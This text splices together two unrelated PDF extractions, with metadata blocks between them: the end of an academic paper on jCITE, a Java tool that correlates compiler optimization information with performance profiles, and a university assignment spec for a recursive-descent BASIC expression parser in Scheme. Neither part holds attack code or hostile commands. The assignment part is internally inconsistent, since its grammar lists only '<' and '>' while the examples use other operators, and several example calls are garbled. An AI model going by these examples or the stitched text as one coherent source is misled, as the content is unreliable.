that are written and read from. 3.5 Running and examining performance experiments The MIPS Pro Compilers include the Speedshop package. Speedshop is the generic name for an integrated package of performance tools to run performance experiments on executables, and to examine the results of those experiments. Experiments are recorded using the ssrun command, as follows: ``` ssrun -<exptype> <a.out-name> <a.out arguments> ``` where `<exptype>` is one of the named experiments. A common experiment is PC sampling. The program counter is statistical sampled, using 16-bit bins, based on user and system time, with a sample interval of 10 milliseconds. The size of the sampling interval and the size of bins can both be controlled. On the R10000 which has hardware performance counters, a variety of other statistical PC sampling experiments can be performed [11, 9]. These include (among others): - **Cycle Counts** which uses statistical PC sampling, based on overflows of the cycle hardware performance counter. - **Primary Data Cache Misses** uses statistical PC sampling, based on overflows of the primary data-cache miss counter. - **Secondary Data Cache Misses** uses statistical PC sampling, based on overflows of the secondary data-cache miss counter. The `prof` command is used to generate a report about a specified experiment. jCITE assumed that the `prof` command has been run to produce the performance experiment data file. 3.6 Inner workings of jCITE The high-level structure of jCITE is presented in **Figure 6**. Upon start jCITE looks for all files which are associated with the application. First the source and transformed source files are read and the data structures with their representation are created. The file which describes mapping between lines in the two sources is parsed with an S-Expression reader. The sources are annotated with appropriate mappings. The S-Expression reader is invoked again to read LNO (Loop Nest Optimizer) information. That information is attached to the internal representation of the source. Next the profile information produced by Speedshop is read and attached to corresponding sources. The data structures are organized so that all this information can be quickly accessed. Whenever needed additional data structures are created to contain local information extracted from the global data structures. For example on a mouse click for a given source line, the data structures associated with that source file as well data structures for that specific line are searched and the information is merged into the pop-up menu data structure which contains labels to be placed in the menu and actions to be performed if a menu item is selected. This data structure is passed to the method which displays and handles pop-up menus. Similarly, when the user adds a new histogram to the currently displayed source, a data structure for that histogram is created and inserted into the UI container displaying that source. 4 Experiments In this section we present some of the experiments that we did using jCITE. We have not yet released jCITE to a wide audience. 4.1 Performance tuning the compiler We present two examples. The first one is a real world application from the supercomputing group within SGI. The core of the application was a subroutine `mai.opel_Track3d`. They were not happy with the performance of this subroutine and wanted us to examine it closely. It had an inner loop that was 448 lines long. The MIPS Pro 7.x compiler fissioned this loop into 15 loops but the software pipeliner was able to pipeline only some of the loops. The assembly code was almost impossible to decipher since the Code Generator had unrolled all the loops and also had introduced unroll remainder loops. We extended jCITE with a simple script that told us the cycles each of the loops produced after the fissioning and whether it was software pipelined or not. Using this information we were able to tune the loop fissioner to produce a better balance of fissioned loops which resulted in all the fissioned loops getting software pipelined. We encountered the second example when we were tracking a regression in the SPEC95 applu benchmark between compiler releases. We used a combination of runtime performance information and compiler information to track and fix this problem. In one of the frequently executed subroutine, two subroutines it called were inlined together to produce a bigger routine that has two outer loops that iterate over the same space. The earlier version of the compiler was able to fuse the two loops together but the later version of the compiler was not. We identified the problem using jCITE as one that invoked the optimizer, a label that was introduced between the two loops due to inlining was not being removed causing the loop nest optimizer to not fuse the loops. 4.2 Hand tuning the SPEC95 130.li integer benchmark We wanted to see if we could use jCITE to tune programs other than scientific programs. We took upon ourselves a challenge to see if we could improve an arbitrary integer program. We decided to choose the lisp interpreter 130.li for several reasons: - We gave ourselves 3–4 days to tune the program and wanted a large enough program but not too large. 130.li was among the larger SPEC95 benchmarks. - We wanted to give feedback to the optimizer group if we found anything interesting. - SPEC95 programs are optimized only using compiler flags and we were curious to see how much better hand optimization could do. We first profiled the program and on looking at the application hot-spots using jCITE we determined the following optimization opportunities: Opt1 The compiler was not recovering common subexpressions across basic blocks. We recoded the macros consp, listp to use fast versions when their argument was evaluated to be not null in a prior basic block. Opt2 Varargs routines were not being inlined. We specialized the varargs routine into 7 different versions and changed all the call sites to use the right version. We also cleaned up the body of the varargs routine to no longer loop through the varargs. For example void func_vararg(int *args,...) when used with one and two arguments could be recoded as void func_1(int *arg1), and void func_2(int *arg1, int *arg2) respectively. Opt3 Switch statements were compiled in a table driven fashion. We wanted to use ‘if’ statements in a few cases. Opt4 If recursive procedures have fast return path for empty arguments the register allocator today spills registers on entry to function and restores them across the fast return path. We recoded the procedure to eliminate the condition check and moved the condition to the caller. Opt5 We observed that some of the compares could be converted to bit operations to do the compares faster. This was an optimization that we do not believe a compiler would be able to do. Opt2 and Opt4 needs an interprocedural optimizer. Opt5 is not possible through a compiler. Opt1 and Opt3 are doable by a good optimizer. Here are the experimental measurements on an Origin2000 machine with an R10000 processor. We used the hardware cycle counter to get an estimate of where to start looking. <table> <thead> <tr> <th>Optimization attempted</th> <th>Measured Time</th> <th>Percentage improvement over base case (cumulative)</th> </tr> </thead> <tbody> <tr> <td>Original</td> <td>119.616u 0.095s 2:00.30</td> <td>0%</td> </tr> <tr> <td>Opt1 (redundant checks)</td> <td>119.199u 0.161s 1:59.98</td> <td>negligible</td> </tr> <tr> <td>Opt2 (no var args just in xleval.c)</td> <td>113.797u 0.091s 1:54.48</td> <td>4.8%</td> </tr> <tr> <td>Opt2.1 (no var args everywhere)</td> <td>107.821u 0.152s 1:48.57</td> <td>9.8%</td> </tr> <tr> <td>Opt3 (converted switch to if condition for livecar/livecdr)</td> <td>101.505u 0.074s 1:42.08</td> <td>15.1%</td> </tr> <tr> <td>Opt4 (moved if (arg == NULL) return; out of mark to caller)</td> <td>97.188u 0.079s 1:37.77</td> <td>18.7%</td> </tr> <tr> <td>Opt5 (bit operations instead of compares)</td> <td>92.498u 0.077s 1:33.06</td> <td>23%</td> </tr> </tbody> </table> As the table shows with 3–4 days of work we were able to get close to 23% improvement over the base case. We compiled the base case to use the new ABI, interprocedural inlining, -O3 optimization, targeting the R10000 processor (-Ofast). 5 Lessons learned and conclusions In this paper we have described a Java based browser that will be valuable for a performance oriented programmer. We are not aware of any software that provide such extensive compiler optimization information as well as combines runtime performance information with compiler optimization information in a visually appealing way either in academia or industry. We learned several things from designing and implementing jCITE. - Combining compiler information with runtime performance information can lead to new insights into how program performance matches the hardware. - Novel visual display are much more attractive in presenting performance data than static text data. Correlating data to provide information is even more useful. Browsers for performance programming should strive for high bandwidth (more information) to the user. - Java specific lessons: - Java based technology promises portability, better client software on Unix machines, and much more of a chance for ISV’s to participate in providing tools for high end programming like scientific and engineering programming. - GUI portability has a price: performance. The state of art of Java compilers and components are not yet sufficient to develop large scale portable GUI software. - Using multi threading safe data structures such as Vectors [2] are expensive today on most platforms even when the application is single threaded. jCITE uses Vectors in a number of places. - The I/O performance of Java VM’s we have used have mostly been insufficient for programs such as jCITE that read lots of files. - The lack of features in AWT (JDK 1.0.2) such as pop-up menus, cut and paste was disheartening. Several of these deficiencies have been fixed in JDK 1.1 [6]. Sun has also provided a road map for lightweight and fast UI components. The competition in the UI between Microsoft’s AFC and Sun’s JFC is going to lead to much better UI software similar to what we witnessed in Browser wars and the technology that was swept with it. - It is better to design a lightweight browser from the ground up for performance programming than integrate functionality into a fully functional editor. jCITE’s precursor CITE was written entirely in Emacs Lisp and worked within Lucid’s XEmacs. CITE was heavyweight due to it’s dependence on XEmacs. Also religious wars over choice of editors are best left to newsgroups than products. 5.1 Related Work Sigma [8] was a project at Indiana University. It had an Emacs based front-end which allowed interactive transformations to be applied to a program. It had a library to examine and manipulate Intermediate Representation of the program. It was intended more as a restructuring tool than for performance programming. The program analysis group at Microsoft Research [5] are developing advanced programming tools. Their programming tool is currently Emacs-based and uses the result of their intra- and interprocedural program analysis. Their system differs from ours in that their focus is on issues such as alias and dataflow analysis in the context of C and C++ programs. We also plan to incorporate results of the alias analysis from our compiler into our programming tool. The Parascope programming environment, the D editor [3] and the subsequent work at Rice on compilation and performance evaluation environment is similar in spirit to ours. They focus more on data parallel programs in a message passing environment. We plan to incorporate results from data distributions for parallel programs running on Scalable Shared Memory machines that are being developed in our compiler into our programming tool. SGI’s Workshop MPF tool [7] provides information on KAI parallelizer optimizations. It is written to work only on SGI’s. KAI [4] has announced a new suite of tools written in Java to provide portability. They are also working towards providing portability of the parallel directives across a number of platforms so that ISV’s can migrate their parallel code easily across platforms. References Figure 1: SYNCHRONIZING ORIGINAL SOURCE and TRANSFORMED SOURCE: The example we are seeing is matrix multiply (mmjik200) of a two 200x200 matrices. The window on the left is the original source and the window on the right is the transformed source. (View in color) Figure 2: EXAMPLE OF COMPILER INFORMATION FOR mmjik200 LOOP NEST: This information is produced by the compiler in a separate file that jCITE knows and can read. It has information on various loop optimizations including cache blocking, register blocking, fission/fusion, and prefetching. Figure 3: ANNOTATED PERFORMANCE INFORMATION ON THE SOURCE The example we are seeing is from the SPEC95 fp benchmark 107.mgrid. The left window is the original source annotated with cycle counts from the R10000 hardware counters and parallelization information. A histogram view of the per line cycle counts is overlayed on top of the source window. Navigating the histogram navigates the source and transformed source. The snapshot was taken with the mouse in the histogram window for the most number of cycles (43.4% of all cycles). This corresponds to the 3D array assignment in the subroutine resid. Figure 4: COMBINING PERFORMANCE INFORMATION and COMPILER INFORMATION: The example we are seeing is from the SPEC95 fp benchmark 107.mgrid. The left window is the original source annotated with cycle counts and secondary cache miss counts from the R10000 hardware counters. The histogram overlays show the overall cycle counts and cache misses. The frame at the bottom is as a result of a query to obtain the compiler optimization information. Figure 5: BLACK BOX ARCHITECTURE: jCITE takes several inputs—the original source, the transformed source, assembly, compiler information file, and performance experiment data files if any. Its output is a visual representation showing how all its inputs relate to one another. For example showing how the source(transformed source) relate to one another. At present jCITE works for Fortran 77 and C. Figure 6: **INTERNALS of jCITE**: Two main components, the READERS and the UI ABSTRACTIONS.
{"Source-Url": "http://aspen.ucs.indiana.edu/pss/pcrc/doc/rochester/java-cite.pdf", "len_cl100k_base": 6507, "olmocr-version": "0.1.49", "pdf-total-pages": 15, "total-fallback-pages": 0, "total-input-tokens": 32744, "total-output-tokens": 7811, "length": "2e12", "weborganizer": {"__label__adult": 0.00029540061950683594, "__label__art_design": 0.0002765655517578125, "__label__crime_law": 0.0002830028533935547, "__label__education_jobs": 0.0005154609680175781, "__label__entertainment": 6.312131881713867e-05, "__label__fashion_beauty": 0.00013971328735351562, "__label__finance_business": 0.00019633769989013672, "__label__food_dining": 0.00028967857360839844, "__label__games": 0.0004580020904541016, "__label__hardware": 0.0019102096557617188, "__label__health": 0.0004127025604248047, "__label__history": 0.0002186298370361328, "__label__home_hobbies": 9.638071060180664e-05, "__label__industrial": 0.0005636215209960938, "__label__literature": 0.00016260147094726562, "__label__politics": 0.00020456314086914065, "__label__religion": 0.00047397613525390625, "__label__science_tech": 0.043304443359375, "__label__social_life": 7.385015487670898e-05, "__label__software": 0.008544921875, "__label__software_dev": 0.9404296875, "__label__sports_fitness": 0.00032782554626464844, "__label__transportation": 0.0005469322204589844, "__label__travel": 0.00018584728240966797}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 33629, 0.0252]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 33629, 0.4782]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 33629, 0.9208]], "google_gemma-3-12b-it_contains_pii": [[0, 3524, false], [3524, 6808, null], [6808, 10403, null], [10403, 13417, null], [13417, 17071, null], [17071, 20923, null], [20923, 24245, null], [24245, 27957, null], [27957, 31539, null], [31539, 31803, null], [31803, 32091, null], [32091, 32695, null], [32695, 33138, null], [33138, 33538, null], [33538, 33629, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3524, true], [3524, 6808, null], [6808, 10403, null], [10403, 13417, null], [13417, 17071, null], [17071, 20923, null], [20923, 24245, null], [24245, 27957, null], [27957, 31539, null], [31539, 31803, null], [31803, 32091, null], [32091, 32695, null], [32695, 33138, null], [33138, 33538, null], [33538, 33629, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 33629, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 33629, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 33629, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 33629, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 33629, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 33629, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 33629, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 33629, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 33629, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 33629, null]], "pdf_page_numbers": [[0, 3524, 1], [3524, 6808, 2], [6808, 10403, 3], [10403, 13417, 4], [13417, 17071, 5], [17071, 20923, 6], [20923, 24245, 7], [24245, 27957, 8], [27957, 31539, 9], [31539, 31803, 10], [31803, 32091, 11], [32091, 32695, 12], [32695, 33138, 13], [33138, 33538, 14], [33538, 33629, 15]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 33629, 0.05114]]}
olmocr_science_pdfs
2024-11-27
2024-11-27
09fd7e9c883b7dcef34247171e19a5cd0275213d
In this assignment you will write a set of procedures for parsing various token sequences that appear in programs written in the BASIC language. The code that we write in this assignment will be used as part of a larger project in our next assignment, Homework 8, which will be an interpreter for a subset of BASIC syntax (including but not limited to expressions). Include your answers in a file named `parser.scm`. A skeleton of this file is provided on the web site. ### Background Information about Parsing: A grammar is a set of syntax rules that collectively describe a language. Parsing (syntactic analysis) is the process of analyzing a text, made of a sequence of tokens, to determine its grammatical structure with respect to a given grammar. A parser is a component in an interpreter or compiler that checks for correct syntax. In a compiler, the parser often builds a tree, list, or other hierarchical structure from the input tokens. An interpreter instead runs the code as it parses it. Parsing is often considered to be distinct from lexical analysis, which is the process of reading each character of text in a program and splitting up those characters into a set of tokens. A top-down parser looks at the sequence of tokens in order from start to finish, trying to "expand" its understanding of the program elements from large items (such as a program or function) down to small ones (such as a single expression). By contrast, a bottom-up parser begins by identifying the smallest and simplest symbols in the program first, then expanding outward from them to discover their context within larger forms such as expressions, statements, functions, etc. In this assignment you will write a particular subcategory of top-down parser known as a recursive descent parser. In a recursive descent parser, you begin with a grammar for the language of interest, and you use that grammar to write a series of procedures, one for each major non-terminal symbol and/or production rule in that grammar. As your parser reads tokens of input, you use the sequences and values of those tokens to decide which of your procedures to call. Since some forms can contain themselves (for example, an expression can contain other expressions), you sometimes end up with one of your production procedures calling itself; or you end up with a chain of calls such as \( a \rightarrow b \rightarrow c \rightarrow a \). In this sense the parser is recursive. Its descent is the path that it walks through the grammar rules and their associated functions as it parses the various tokens of the program that you feed to it. ### Our Language's Grammar: Our grammar below is in a format called Extended Backus-Naur Form (EBNF). It has the following production rules: - `<test>` ::= `<expression>` `("<" | ">")` `<expression>` - `<expression>` ::= `<term>` `{("+" | "-") <term>}` - `<term>` ::= `<element>` `{("*" | "/") <element>}` - `<element>` ::= `<factor>` `{"^" <factor>}` - `<factor>` ::= `<number>` | | "(" `<expression>` ")" | | <f> "(" `<expression>` ")" - `<f>` ::= `SIN` | `COS` | `TAN` | `ATN` | `EXP` | `ABS` | `LOG` | `SQR` | `RND` | `INT` Here are some details about EBNF: - The pipe character ("|") means "or." The final rule says that an "<f>" is either `SIN` or `COS` or `TAN`, and so on. - Curly braces indicate "0 or more of." For example, the production for `<element>` indicates that it is composed of a `<factor>` followed by 0 or more occurrences of "^ `<factor>`". So it would match sequences like this: `<factor> ^ `<factor> ^ `<factor> ^ `<factor> ^ `<factor>` - Tokens shown in quotes in the grammar represent literal values. In Scheme these will be stored as symbols. - Parentheses are used to group subparts of a rule. For example, the `<expression>` rule uses parentheses to indicate that terms are separated by either a plus or a minus, as in: `<term>` + `<term>` + `<term>` - `<term>` + `<term>` - `<term>` - `<term>` You should define a procedure to parse each of the five major elements described above. The sixth rule is slightly different (described below). Each of your procedures will take a list of tokens as its parameter. It should consume tokens from the list and replace those tokens with the value obtained by evaluating the tokens. For example, `parse-term` evaluates the multiplicative operators `*` and `/`. If it is passed the list `(2.5 * 3.4 / 2 THEN 210)`, it will evaluate `2.5 * 3.4 / 2`, obtain `4.25` and replace the tokens it parsed with `4.25`, returning the list `(4.25 THEN 210)`. These procedures are "greedy" in that they will consume as many tokens from the front of the list as they can that can be part of the given grammar element. Above, the token `THEN` can't be part of a `term`, so the procedure stops consuming tokens when it encounters it. Though it is greedy, it should pay attention only to tokens that appear at the front of the list. Parentheses are difficult to handle as symbols, so we'll use tokens `lparen` and `rparen` for left and right parentheses. There are several cases where Scheme returns rational numbers when we would prefer to obtain real numbers. For example, division can produce such results as can exponentiation with integers where the exponent is negative: ``` > (/ 3 4) 3/4 > (expt 3 -2) 1/9 ``` For these cases, you should call the `exact->inexact` procedure to convert the rational to a real number: ``` > (exact->inexact (/ 3 4)) 0.75 > (exact->inexact (expt 3 -2)) 0.1111111111111111 ``` **Procedures to Implement:** You are to write the following parsing procedures *(also see the end of this spec for a suggested development strategy)*: 1. **parse-factor** Write a procedure `parse-factor` that parses a factor at the front of a list, replacing the tokens that were part of the factor with the numeric value of the factor. Recall the grammar rule for a factor: ```plaintext <factor> ::= <number> | ("+" | "-") <factor> | "(" <expression> ")" | <f> "(" <expression> ")" | ``` As indicated in the grammar, a factor is either a simple number or a sign followed by a factor (e.g., the negation of a number) or a parenthesized expression or a parenthesized call on a function. For example: ``` > (parse-factor '((3.5 2.9 OTHER STUFF))) (3.5 2.9 OTHER STUFF) > (parse-factor '(- 7.9 3.4 * 7.2)) (-7.9 3.4 * 7.2) > (parse-factor '((lparen 7.3 - 3.4 rparen + 3.4))) (3.9 + 3.4) > (parse-factor '((SQR lparen 12 + 3 * 6 - 5 rparen))) (5) > (parse-factor '(- lparen 2 + 2 rparen * 4.5)) (-4 * 4.5) ``` Keep in mind that your procedures should be greedy, but not overly greedy. For example: ``` > (parse-factor '(- 13 - 17 - 9)) (-13 - 17 - 9) ``` Only the first combination of minus and number is turned into a negative number. The method should process just one factor at the front of the list, not multiple factors. 2. \texttt{parse-element} Write a procedure \texttt{parse-element} that parses an element at the front of a list, replacing the tokens that were part of the element with the numeric value of the element. Recall the grammar rule for an element: \[ \texttt{<element>} ::= \texttt{<factor>} \{ \texttt{^} \texttt{<factor>} \} \] As indicated in the grammar, an element is a series of one or more factors separated by the token \texttt{^} which indicates exponentiation. Your procedure should be "greedy"; it should consume as many tokens as possible that could be part of an element. The \texttt{^} operators should be evaluated left-to-right. You can call the standard \texttt{expt} procedure to compute the exponent. As noted above, the result can be a real number when the exponent is negative, so you need to call \texttt{exact->inexact} in that case to convert from a rational to a real number. Below are several examples of \texttt{parse-element}'s intended behavior: \[ \begin{align*} > &\ (\texttt{parse-element }'(2 \ ^\ 2 \ ^\ 3 \ \text{THEN} \ 450)) \\ & (64 \ \text{THEN} \ 450) \\ > &\ (\texttt{parse-element }'(2 \ ^\ 2 \ ^\ -3 \ \text{THEN} \ 450)) \\ & (0.015625 \ \text{THEN} \ 450) \\ > &\ (\texttt{parse-element }'(2.3 \ ^\ 4.5 \ * \ 7.3)) \\ & (42.43998894277659 \ * \ 7.3) \\ > &\ (\texttt{parse-element }'(7.4 \ + \ 2.3)) \\ & (7.4 \ + \ 2.3) \\ > &\ (\texttt{parse-element }'(2 \ ^\ 3 \ ^\ 4 \ ^\ 5 \ 2 \ ^\ 3 \ 4 \ ^\ 5)) \\ & (1152921504606846976 \ 2 \ ^\ 3 \ 4 \ ^\ 5) \end{align*} \] 3. \texttt{parse-term} Write a procedure \texttt{parse-term} that parses a term at the front of a list, replacing the tokens that were part of the term with the numeric value of the term. Recall the grammar rule for a term: \[ \texttt{<term>} ::= \texttt{<element>} \{(\texttt{*} | \texttt{/}) \texttt{<element>}\} \] As indicated in the grammar, a term is a series of elements separated by the tokens \texttt{*} and \texttt{/} (multiplication and division). Your procedure should consume as many tokens as possible that could be part of a term. The \texttt{*} and \texttt{/} operators should be evaluated left-to-right. Scheme will potentially be returning a rational number when we use division, which we don't want. So for each division, return the value obtained by passing the result to the standard Scheme procedure \texttt{exact->inexact}, as in \texttt{(exact->inexact 7/8)}, which returns \texttt{0.875}. For example: \[ \begin{align*} > &\ (\texttt{parse-term }'(2.5 \ * \ 4 \ + \ 9.8)) \\ & (10.0 \ + \ 9.8) \\ > &\ (\texttt{parse-term }'(38.7 \ / \ 2 \ / \ 3 \ \text{THEN} \ 210)) \\ & (6.45 \ \text{THEN} \ 210) \\ > &\ (\texttt{parse-term }'(7.4 \ \texttt{lparen} \ 2.4 \ - \ 3.8 \ \texttt{rparen} \ / \ 4 \ - \ 8.7)) \\ & (-2.59 \ - \ 8.7) \\ > &\ (\texttt{parse-term }'(3 \ / \ 4 \ + \ 9.7)) \\ & (0.75 \ + \ 9.7) \\ > &\ (\texttt{parse-term }'(2 \ * \ 3 \ * \ 4 \ + \ 3 \ * \ 8)) \\ & (24 \ + \ 3 \ * \ 8) \\ > &\ (\texttt{parse-term }'(24 \ / \ 2 \ - \ 13.4)) \\ & (12.0 \ - \ 13.4) \end{align*} \] 4. \texttt{parse-expression} Write a procedure \texttt{parse-expression} that parses an expression at the front of a list, replacing the tokens that were part of the expression with the numeric value of the expression. Recall the grammar rule for an expression: \[ \texttt{<expression>} ::= \texttt{<term>} \{(\texttt{+} | \texttt{-}) \texttt{<term>}\} \] As indicated in the grammar, an expression is a series of terms separated by the tokens \texttt{+} and \texttt{-} (addition and subtraction). Your procedure should consume as many tokens as possible that could be part of an expression. The \texttt{+} and \texttt{-} operators should be evaluated left-to-right. For example: > (parse-expression '(12.4 - 7.8 * 3.5 THEN 40)) (-14.9 THEN 40) > (parse-expression '(2 + 3.4 - 7.9 <= 7.4)) (-2.5 <= 7.4) > (parse-expression '(3 * 4 ^ 2 / 5 + SIN (lparen 2 rparen))) (10.50929742682568) > (parse-expression '(15 - 3 - 2 foo 2 + 2)) (10 foo 2 + 2) 5. parse-test Write a procedure parse-test that parses a test at the front of the list, replacing the tokens that were part of the test with the boolean value of the test (#t or #f). Recall the grammar rule for a test: <test> ::= <expression> ("<" | ">" | "<=" | ">=" | "><") <expression> As indicated in the grammar, a test is an expression followed by a relational operator, then an expression. For example: > (parse-test '(3.4 < 7.8 THEN 19)) (#t THEN 19) > (parse-test '(2.3 - 4.7 ^ 2.4 <> SQR (lparen 8 - 4.2 ^ 2 * 9 rparen) FOO)) (#t FOO) > (parse-test '(2 ^ 4 = 4 ^ 2)) (#t) The sixth grammar rule has a list of function names. Because it doesn't mention any other grammar elements, it doesn't need its own parsing procedure. You are welcome to define a helper procedure that processes it, but it's not a requirement. In evaluating expressions involving these functions, you will need to translate the named function into a Scheme procedure. The skeleton file includes the following association list that will help you to accomplish this task: (define functions '((SIN . sin) (COS . cos) (TAN . tan) (ATN . atan) (EXP . exp) (ABS . abs) (LOG . log) (SQR . sqrt) (RND . rand) (INT . trunc))) Each element of the association list is a dotted pair where the car is a key and the cdr is a value (like a Map in Java). Scheme has a standard procedure called assoc that will search for a particular key. For example, given the list above, the expression (assoc 'ATN functions) returns (ATN . atan). To get the atan symbol from this, you’d take the cdr of the pair object. Because it’s an improper dotted pair and not a list, you use cdr instead of cadr. If the key is not found, as in the call (assoc 'FOO functions), you get #f (false) as a result. Error-Handling: In your parse routines, you should test for potential errors and should call the error procedure if an error is encountered. The call should indicate which parsing routine detected the error. Execute one of the following five commands: (error "illegal test") (error "illegal expression") (error "illegal term") (error "illegal element") (error "illegal factor") Most errors will be detected by parse-factor since it is the lowest level construct in the grammar. In grading, we won't be concerned about which of your parsing methods detects the error. All that we care about is that your code generates the error (versus, say, calling car on an empty list). Below are some examples of calls that should produce errors: (parse-term '(2.5 * 4 *)) ; no number after second * (parse-factor '(foo bar)) ; the symbol foo is not a legal factor (parse-factor '(- foo)) ; a minus must be followed by a factor (parse-term '(3 * foo)) ; no number after * (parse-factor '(lparen rparen)) ; needs an expression between parens (parse-factor '(lparen 2 + 3 4)) ; no right paren when we encounter 4 Suggested Development Strategy: First, write a simple version of `parse-factor`. Have it handle a number. This is a pretty trivial case, because it just puts the number back at the front of the list. But then have it handle the rule where a factor can be a sign followed by a factor. Whenever you see a non-terminal on the right side of a grammar rule, you know that it should be handled by a call on the corresponding parsing procedure. So this is a case where `parse-factor` is going to call `parse-factor`. If you code this correctly, you should be able to handle cases like this: - `(parse-factor '(2 + 2))` `(2 + 2)` - `(parse-factor '(- 2 + 2))` `(-2 + 2)` - `(parse-factor '(- - 2 + 2))` `(2 + 2)` - `(parse-factor '(- - - - 2 2))` `(-2 2)` - `(parse-factor '(+ - - + + - + + 2 2))` `(2 2)` Second, write `parse-element`. It has to handle the case where there is just a factor and the case where that is followed by zero or more of an up-arrow followed by factor, as in: - `(parse-element '(2 + 2))` `(2 + 2)` - `(parse-element '(- - - 2 + 2))` `(-2 + 2)` - `(parse-element '(2 ^ 3 - 4))` `(8 - 4)` - `(parse-element '(- 2 ^ - - - 3 * 17))` `(0.125 * 17)` - `(parse-element '(2 ^ 3 ^ 2 / 14))` `(64 / 14)` - `(parse-element '(- - - 7 ^ - - - 4 ^ - - - 2 < 74.5))` `(1.7346652555743034e-007 < 74.5)` (Remember that the grouping is left-to-right.) Third, write `parse-term` and `parse-expression`. You could initially have `parse-term` handle just multiplication and `parse-expression` handle just addition. That makes them look a lot like `parse-element`. Fourth, go back to `parse-factor` and have it deal with parenthesized expressions. Then deal with function calls. Fifth, write `parse-test`. Sixth, finish whatever you left unfinished (e.g., if you had `parse-expression` do just addition, then have it handle subtraction as well), including testing for errors. Recall that you can use the DrScheme debugger to step through the execution of your various procedures to find bugs. You can also insert calls to the display procedure to view printed output on the console while your code is running. If you produce any test cases or testing code for this assignment, you are welcome to share it with your classmates using our course discussion forum. Any shared testing code may test for external behavior but may not test any aspects of the internal correctness of the student's Scheme source code itself. The instructor and TAs reserve the right to remove testing code that we feel is inappropriate for any reason. Grading and Submission: Submit your finished **parser.scm** file electronically using the link on the class web page. For reference, our solution is roughly 150 lines (70 "substantive" lines) long according to the course Indenter page. You don't need to match this number or even come close to it; it is just a rough guideline. Your program should not produce syntax or runtime **errors** when executed. You may lose points if you name your procedures or top-level values incorrectly, even if their behavior is correct. Your code should work for both basic and advanced cases. Perform your own **testing**, and remember to test edge cases. You should not use any of Scheme's language features that involve **mutation**, such as the `set!`, `set-car!`, or `mcons` procedures. You are not allowed to use mutable lists or vectors in solving this problem. You should not define any Scheme **macros**. Your code should compile and execute properly using the "Pretty Big" language level of PLT Scheme. Otherwise you may use any Scheme library constructs you like to help you solve a problem unless those constructs are explicitly forbidden by this spec or the problem description. As always, if the solution to one procedure is useful in helping you solve a later procedure, you should call the earlier procedure from the later procedure. You can include any testing code you develop (although it should be labeled as such). You may define other **global variables or procedures** not described in this document, as long as they are non-trivial and are used by more than one top-level procedure specified in this document. If you write inner helper procedures, choose a suitable set of **parameters** for each one. Don't pass unnecessary parameters or parameters that are unmodified duplicates of existing bound parameters from the outer procedure. The lists of tokens passed to your various procedures often contain various **symbols**. You should process and handle these symbols without converting them into strings first. (Treating symbols as strings everywhere is bad Scheme Zen.) You are expected to use good programming **style**, such as naming, indentation/spacing, and avoiding redundancy when possible. Avoid long lines of over 100 characters in length; if you have such a line, split it into multiple lines. Recall that DrScheme is able to auto-indent your entire program for you simply by selecting code and pressing the Tab key. In general, favor the `cons` procedure to grow lists versus the `concat` procedure (though the `concat` procedure is sometimes necessary and is not forbidden entirely). Favor the use of higher-order procedures such as `map` over manually iterating over / recursively processing a list. Place a descriptive **comment** header at the top of your program along with a comment header on each procedure, including a description of the meaning of its parameters, its behavior/result, and any Preconditions it assumes. If you declare a non-trivial or non-obvious inner helper procedure, also briefly comment the purpose of that helper in a similar fashion. Since the procedures in this assignment are larger and more elaborate, you should put comments within the procedures explaining the complex code, such as which grammar rule a particular part of the code is processing, etc. **Efficiency** on a fine level of detail is not crucial on this assignment. But code that is unnecessarily computationally inefficient (such as code that performs an algorithm that should be $O(n)$ in $O(n^2 \log n)$ time) might receive a deduction. **Redundancy**, such as recomputing a value unnecessarily or unneeded recursive cases, should be avoided. This assignment involves a lot of similar but not identical code, such as checking whether a given expression matches a particular pattern, then breaking apart the list to process it based on that pattern. Intelligently utilize helper procedures to capture common code to avoid redundancy. Avoid repeating large common subexpressions as much as possible; for example, the pseudo-code "if (test) then (1 + really long expression) else (2 + really long expression)" is better written as "((if test then 1 else 2) + really long expression)".
{"Source-Url": "http://courses.cs.washington.edu/courses/cse341/10au/homework/7/spec.pdf", "len_cl100k_base": 5361, "olmocr-version": "0.1.50", "pdf-total-pages": 6, "total-fallback-pages": 0, "total-input-tokens": 17746, "total-output-tokens": 5986, "length": "2e12", "weborganizer": {"__label__adult": 0.00046181678771972656, "__label__art_design": 0.0004944801330566406, "__label__crime_law": 0.0003681182861328125, "__label__education_jobs": 0.00958251953125, "__label__entertainment": 9.79900360107422e-05, "__label__fashion_beauty": 0.00020265579223632812, "__label__finance_business": 0.00021445751190185547, "__label__food_dining": 0.0006151199340820312, "__label__games": 0.0008392333984375, "__label__hardware": 0.0006856918334960938, "__label__health": 0.0003528594970703125, "__label__history": 0.0002290010452270508, "__label__home_hobbies": 0.00016832351684570312, "__label__industrial": 0.0004405975341796875, "__label__literature": 0.0005288124084472656, "__label__politics": 0.0002803802490234375, "__label__religion": 0.000606536865234375, "__label__science_tech": 0.004230499267578125, "__label__social_life": 0.0002267360687255859, "__label__software": 0.004337310791015625, "__label__software_dev": 0.9736328125, "__label__sports_fitness": 0.00039505958557128906, "__label__transportation": 0.0005764961242675781, "__label__travel": 0.0002366304397583008}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 20495, 0.08829]], 